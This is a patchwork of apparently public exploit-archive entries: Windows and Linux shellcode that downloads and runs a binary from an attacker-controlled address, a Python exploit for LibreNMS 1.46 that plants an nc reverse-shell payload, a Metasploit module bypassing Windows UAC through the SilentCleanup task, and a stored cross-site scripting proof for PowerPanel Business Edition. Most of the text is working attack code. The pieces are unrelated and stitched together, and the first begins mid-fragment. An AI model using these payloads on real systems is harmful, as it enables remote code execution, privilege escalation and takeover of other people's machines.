push 0x26202265 ; & "e
push 0x78652e6c ; xe.l
push 0x6976655c ; ive\
push 0x3a632220 ; :c"
push 0x6578652e ; exe.
push 0x6c697665 ; live
push 0x2f30312e ; /01.
push 0x30312e38 ; 01.8
push 0x36312e32 ; 61.2
push 0x39312f2f ; 91//
push 0x3a707474 ; :ptt
push 0x68202230 ; h "0
push 0x33626f6a ; 3boj
push 0x6e222072 ; n" r
push 0x6566736e ; efsn
push 0x6172742f ; art/
push 0x20657865 ;  exe
push 0x2e6e696d ; .nim
push 0x64617374 ; dast
push 0x69622074 ; ib t
push 0x72617473 ; rats

mov edi,esp
push edi
mov eax, 0x77c293c7
call eax

xor eax, eax
push eax
mov eax, 0x7c81caa2
call eax

*/

char code[]=

"\x31\xc0\x66\xb8\x72\x74\x50\x68\x6d\x73\x76\x63\x54\xbb\x77\x1d\x80\x7c\xff\xd3\x89\xc5\x31\xc0\x50\x68\x2e\x65\x78\x65\x68\x65\x76\x69\x6c\x68\x20\x63\x3a\x5c\x68\x65\x20\x2f\x63\x68\x64\x2e\x65\x78\x68\x26\x20\x63\x6d\x68\x2e\x31\x20\x26\x68\x2e\x30\x2e\x30\x68\x20\x31\x32\x37\x68\x6e\x20\x33\x30\x68\x6e\x67\x20\x2d\x68\x26\x20\x70\x69\x68\x65\x22\x20\x26\x68\x6c\x2e\x65\x78\x68\x5c\x65\x76\x69\x68\x20\x22\x63\x3a\x68\x2e\x65\x78\x65\x68\x65\x76\x69\x6c\x68\x2e\x31\x30\x2f\x68\x38\x2e\x32\x36\x68\x32\x2e\x31\x36\x68\x2f\x2f\x31\x39\x68\x74\x74\x70\x3a\x68\x30\x22\x20\x68\x68\x6a\x6f\x62\x33\x68\x72\x20\x22\x6e\x68\x6e\x73\x66\x65\x68\x2f\x74\x72\x61\x68\x65\x78\x65\x20\x68\x6d\x69\x6e\x2e\x68\x74\x73\x61\x64\x68\x74\x20\x62\x69\x68\x73\x74\x61\x72\x89\xe7\x57\xb8\xc7\x93\xc2\x77\xff\xd0\x31\xc0\x50\xb8\xa2\xca\x81\x7c\xff\xd0";

int main(int argc, char **argv)
 {
int (*func)();
func = (int (*)()) code;
(int)(*func)();
}

/*
# Title: start iexplore.exe
# Author: Joseph McDonagh
# Shellcode length 191
# Could be smaller if the app your are exploiting loads msvcrt.
# Purpose: Use the start command to open internet explorer and connect to a malicious web server
# The command this runs is simply start iexplore.exe http://192.168.10.10/ (Attacker controlled server), which can lead to a more productive payload.
# This code can exploit browser vulnerabilities without (or with) social engineering.
# Tested on: WinXP SP 2
# Thanks to Kartik Durg and sharing the shellcode entry 46281 and sharing the details on the iamroot blog https://iamroot.blog/2019/01/28/windows-shellcode-download-and-execute-payload-using-msiexec/.  This got me going in the right direction. And to POB. Using "start" is helpful for this type of payload.
# Complile on Kali #i686-w64-mingw32-gcc sie.c -o sie.exe
# 

***** Assembly code follows *****

; The portion loads msvcrt to make the syscall.
; Hardcoded for winxp

xor eax, eax             
mov ax, 0x7472           
push eax
push dword 0x6376736d    
push esp

; LoadLibrary (hardcoded for Windows XP. 
; Can find this on a debugger or arwin)
mov ebx, 0x7c801d77    
call ebx
mov ebp, eax             

xor eax, eax       
PUSH eax                ; null terminator
push 0x2f30312e  ; /10.
push 0x30312e38  ; 01.8
push 0x36312e32  ; 61.2
push 0x39312f2f  ; 91//
push 0x3a707474  ; :ptt
push 0x68206578  ; h ex
push 0x652e6572  ; e.er
push 0x6f6c7078  ; olpx
push 0x65692074  ; ei t
push 0x72617473  ; rats

; Below code moves the pointer and executes the system call that runs the command.

mov edi,esp
push edi
mov eax, 0x77c293c7
call eax

xor eax, eax
push eax
mov eax, 0x7c81caa2
call eax
*/

char code[]=

"\x31\xc0\x66\xb8\x72\x74\x50\x68\x6d\x73\x76\x63\x54\xbb\x77\x1d\x80\x7c\xff\xd3\x89\xc5\x31\xc0\x50\x68\x2e\x31\x30\x2f\x68\x38\x2e\x32\x36\x68\x32\x2e\x31\x36\x68\x2f\x2f\x31\x39\x68\x74\x74\x70\x3a\x68\x78\x65\x20\x68\x68\x72\x65\x2e\x65\x68\x78\x70\x6c\x6f\x68\x74\x20\x69\x65\x68\x73\x74\x61\x72\x89\xe7\x57\xb8\xc7\x93\xc2\x77\xff\xd0\x31\xc0\x50\xb8\xa2\xca\x81\x7c\xff\xd0";

int main(int argc, char **argv)
 {
int (*func)();
func = (int (*)()) code;
(int)(*func)();
}

/**

; Shellcode 129 Bytes
; download (via wget) + chmod + execute shellcode + hide output
;      Exec: /usr/bin/wget http://192.168.1.93//x > /dev/null 2>&1
;

global _start

section .text

_start:

    ;fork
    xor eax,eax
    mov al,0x2
    int 0x80
    xor ebx,ebx
    cmp eax,ebx
    jz download

    ; wait(NULL)
    xor eax,eax
    mov al,0x7
    int 0x80

    ; give execution permissions to the binary x
    xor ecx,ecx
    xor eax, eax
    push eax
    mov al, 0xf
    push 0x78
    mov ebx, esp
    xor ecx, ecx
    mov cx, 0x1ff
    int 0x80

    ; execution of binary x
    xor eax, eax
    push eax
    push 0x78
    mov ebx, esp
    push eax
    mov edx, esp
    push ebx
    mov ecx, esp
    mov al, 11
    int 0x80

download:

    push 0xb
    pop eax
    cdq
    push edx
    ; download uri
    mov eax, 0x31263e32 ; 1&>2 hide_output[4]
    mov eax, 0x6c6c756e ; llun/  hide_output[3]
    mov eax, 0x2f766564 ; ved  hide_output[2]
    mov eax, 0x2f3e20 ; />  hide_output[1]
    mov eax, 0x782f2f ; x//  path[1]
    mov eax, 0x33392e31 ;93.1 addr[3]
    mov eax, 0x2e383631 ;.861 addr[2]
    mov eax, 0x2e323931 ;.291  addr[1]
    push eax
    mov ecx,esp
    push edx

    ; download execution in /usr/bin/wget

    push 0x74 ;t
    push 0x6567772f ;egw/
    push 0x6e69622f ;nib/
    push 0x7273752f ;rsu/
    mov ebx,esp
    push edx
    push ecx
    push ebx
    mov ecx,esp
    int 0x80

**/

// nasm -felf32 wget.nasm -o wget.o
// ld -m elf_i386 wget.o -o wget

#include <stdio.h>
#include <string.h>

// gcc -z execstack -fno-stack-protector shellcode.c -o shellcode

// SHELLCODE 129 Bytes

char buf[] = "\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8"
"\x74\x2a\x31\xc0\xb0\x07\xcd\x80\x31\xc9"
"\x31\xc0\x50\xb0\x0f\x6a\x78\x89\xe3\x31"
"\xc9\x66\xb9\xff\x01\xcd\x80\x31\xc0\x50"
"\x6a\x78\x89\xe3\x50\x89\xe2\x53\x89\xe1"
"\xb0\x0b\xcd\x80\x6a\x0b\x58\x99\x52\xb8"
"\x32\x3e\x26\x31\xb8\x6e\x75\x6c\x6c\xb8"
"\x64\x65\x76\x2f\xb8\x20\x3e\x2f\x00\xb8"
"\x2f\x2f\x78\x00\xb8\x31\x2e\x39\x33\xb8"
"\x31\x36\x38\x2e\xb8\x31\x39\x32\x2e\x50"
"\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65"
"\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72"
"\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80";

void main(int argc, char **argv)
{
        int (*func)();
        func = (int (*)()) buf;
        (int)(*func)();
}

#!/usr/bin/python

'''
# Exploit Title: LibreNMS v1.46 authenticated Remote Code Execution
# Date: 24/12/2018
# Exploit Author: Askar (@mohammadaskar2)
# CVE : CVE-2018-20434
# Vendor Homepage: https://www.librenms.org/
# Version: v1.46
# Tested on: Ubuntu 18.04 / PHP 7.2.10
'''

import requests
from urllib import urlencode
import sys

if len(sys.argv) != 5:
    print "[!] Usage : ./exploit.py http://www.example.com cookies rhost rport"
    sys.exit(0)

# target (user input)
target = sys.argv[1]

# cookies (user input)
raw_cookies = sys.argv[2]

# remote host to connect to
rhost = sys.argv[3]

# remote port to connect to
rport = sys.argv[4]

# hostname to use (change it if you want)
hostname = "dummydevice"

# payload to create reverse shell
payload = "'$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {0} {1} >/tmp/f) #".format(rhost, rport)

# request headers
headers = {
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101"
    }

# request cookies
cookies = {}
for cookie in raw_cookies.split(";"):
    # print cookie
    c = cookie.split("=")
    cookies[c[0]] = c[1]


def create_new_device(url):
    raw_request = {
"hostname": hostname,
"snmp": "on",
"sysName": "",
"hardware": "",
"os": "",
"snmpver": "v2c",
"os_id": "",
"port": "",
"transport": "udp",
"port_assoc_mode": "ifIndex",
"community": payload,
"authlevel": "noAuthNoPriv",
"authname": "",
"authpass": "",
"cryptopass": "",
"authalgo": "MD5",
"cryptoalgo": "AES",
"force_add": "on",
"Submit": ""
    }
    full_url = url + "/addhost/"
    request_body = urlencode(raw_request)

    # send the device creation request
    request = requests.post(
        full_url, data=request_body, cookies=cookies, headers=headers
    )
    text = request.text
    if "Device added" in text:
        print "[+] Device Created Sucssfully"
        return True
    else:
        print "[-] Cannot Create Device"
        return False


def request_exploit(url):
    params = {
"id": "capture",
"format": "text",
"type": "snmpwalk",
"hostname": hostname
        }

    # send the payload call
    request = requests.get(url + "/ajax_output.php",
        params=params,
        headers=headers,
        cookies=cookies
        )
    text = request.text
    if rhost in text:
        print "[+] Done, check your nc !"


if create_new_device(target):
    request_exploit(target)

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::Powershell
  include Msf::Post::Windows::Priv
  include Msf::Post::File
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
'Name'                 => 'Windows Escalate UAC Protection Bypass (Via SilentCleanup)',
'Description'          => %q{
        There's a task in Windows Task Scheduler called "SilentCleanup" which, while it's executed as Users, automatically runs with elevated privileges.
        When it runs, it executes the file %windir%\system32\cleanmgr.exe. Since it runs as Users, and we can control user's environment variables,
        %windir% (normally pointing to C:\Windows) can be changed to point to whatever we want, and it'll run as admin.
      },
'License'              => MSF_LICENSE,
'Author'               => [
'tyranid', # Discovery
'enigma0x3', # Discovery
'nyshone69', # Discovery
'Carter Brainerd (cbrnrd)' # Metasploit Module
      ],
'Platform'             => ['win'],
'SessionTypes'         => ['meterpreter', 'shell'],
'Arch'                 => [ARCH_X86, ARCH_X64],
'Targets'              => [['Microsoft Windows', {}]],
'DisclosureDate'       => 'Feb 24 2019',
'References'           => [
        ['URL', 'https://tyranidslair.blogspot.com/2017/05/exploiting-environment-variables-in.html'],
        ['URL', 'https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/'],
        ['URL', 'https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/'],
        ['URL', 'https://forums.hak5.org/topic/45439-powershell-real-uac-bypass/']
      ]
    ))

    register_options(
      [
        OptInt.new('SLEEPTIME', [false, 'The time (ms) to sleep before running SilentCleanup', 0]),
        OptString.new('PSH_PATH', [true, 'The path to the Powershell binary.', "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"])
      ])
  end

  def get_bypass_script(cmd)
    scr = %Q{
      if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) {
        #{cmd}
      } else {
          $registryPath = "HKCU:\\Environment"
          $Name = "windir"
          $Value = "powershell -ExecutionPolicy bypass -windowstyle hidden -Command `"& `'$PSCommandPath`'`";#"
          Set-ItemProperty -Path $registryPath -Name $name -Value $Value
          #Depending on the performance of the machine, some sleep time may be required before or after schtasks
          Start-Sleep -Milliseconds #{datastore['SLEEPTIME']}
          schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I | Out-Null
          Remove-ItemProperty -Path $registryPath -Name $name
      }
    }
    vprint_status(scr)
    scr
  end

  def exploit
    check_permissions

    e_vars = get_envs('TEMP')
    payload_fp = "#{e_vars['TEMP']}\\#{rand_text_alpha(8)}.ps1"

    # Write it to disk, run, delete
    upload_payload_ps1(payload_fp)
    vprint_good("Payload uploaded to #{payload_fp}")

    cmd_exec("#{expand_path(datastore['PSH_PATH'])} -ep bypass #{payload_fp}")
  end

  def check_permissions
    # Check if you are an admin
    case is_in_admin_group?
    when nil
      print_error('Either whoami is not there or failed to execute')
      print_error('Continuing under assumption you already checked...')
    when true
      print_good('Part of Administrators group! Continuing...')
    when false
      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
    end

    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
    end
  end

  def upload_payload_ps1(filepath)
    pld = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
    begin
      vprint_status('Uploading payload PS1...')
      write_file(filepath, get_bypass_script(pld))
      register_file_for_cleanup(filepath)
    rescue Rex::Post::Meterpreter::RequestError => e
      fail_with(Failure::Unknown, "Error uploading file #{filepath}: #{e.class} #{e}")
    end
  end
end

# Exploit Title: PowerPanel Business Edition - Stored Cross Site Scripting (SNMP trap receivers)
# Google Dork: None
# Date: 6/29/2019
# Exploit Author: Joey Lane
# Vendor Homepage: https://www.cyberpowersystems.com
# Software Link: https://dl4jz3rbrsfum.cloudfront.net/software/ppbe340-linux-x86_64.sh
# Version: 3.4.0
# Tested on: Ubuntu 16.04
# CVE : Pending

CyberPower PowerPanel Business Edition 3.4.0 contains a stored cross site scripting vulnerability.  The fields used to configure SNMP trap receivers are not being properly sanitized.  This allows an authenticated user to inject arbitrary javascript code, which will later be executed once a user returns to the Event Action / Recipient page.

To demonstrate the vulnerability, create a file named 'xss.xml' with the following contents:

<?xml version="1.0" encoding="UTF-8" ?>
<ppbe>
<target>
<command>action.notification.trapRecipient.setup</command>
</target>
<inquire>
<trapRecipientSetup>
<action>ADD</action>
<trapRecipient>
<name><script>alert(1)</script></name>
<status>true</status>
<type>1</type>
<ipAddress>127.0.0.1</ipAddress>
<community>public</community>
</trapRecipient>
</trapRecipientSetup>
</inquire>
</ppbe>

Now execute the following curl command to submit a POST request with the contents of the 'xss.xml' file:

curl -X POST -H 'Content-type: text/xml' -d @xss.xml --cookie "JSESSIONID=(A VALID SESSION ID)" http://(A VALID HOST):3052/agent/ppbe.xml

Visiting the Event Action / Recipient page will execute the posted javascript code.